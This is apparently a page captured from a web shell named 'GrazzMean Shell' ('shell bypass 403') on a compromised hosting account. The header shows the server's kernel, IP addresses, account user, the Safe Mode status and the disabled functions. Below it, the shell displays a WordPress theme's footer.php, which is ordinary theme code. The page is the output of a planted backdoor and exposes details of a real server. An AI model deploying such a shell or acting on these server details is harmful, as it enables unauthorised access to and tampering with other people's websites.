shell bypass 403

GrazzMean Shell

Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl

name : footer.php
<?php
/**
 * The header for our theme.
 *
 * This is the template that displays all of the <head> section and everything up until <div id="content">
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Agni Framework
 */

?>

<?php do_action('agni_content_close_tag'); ?>
<?php 



$post_id = get_the_ID();

if( class_exists('WooCommerce') && is_shop() ){
    $post_id = wc_get_page_id('shop');
}

$footer_choice = '2';
$footer_block_choice = esc_attr( get_post_meta($post_id, 'agni_footer_block_id', true) );

if( get_query_var( 'term' ) || get_query_var('cat') || get_query_var('tag') ){
    $term = get_queried_object();

    if( isset( $term->term_id ) ){
        $footer_block_choice = esc_attr( get_term_meta($term->term_id, 'agni_term_footer_block_id', true) );
    }
}

if( empty( $footer_block_choice ) ){

    $footer_choice = esc_attr( cartify_get_theme_option( 'footer_settings_footer_source', '1' ) );
    $footer_block_choice = esc_attr( cartify_get_theme_option( 'footer_settings_content_block_choice', '' ) );
}

do_action( 'agni_footer', $footer_choice, $footer_block_choice ); 

?>
<?php do_action('agni_page_close_tag'); ?>
<?php do_action('agni_body_close_tag');?>

</html>
© 2026 GrazzMean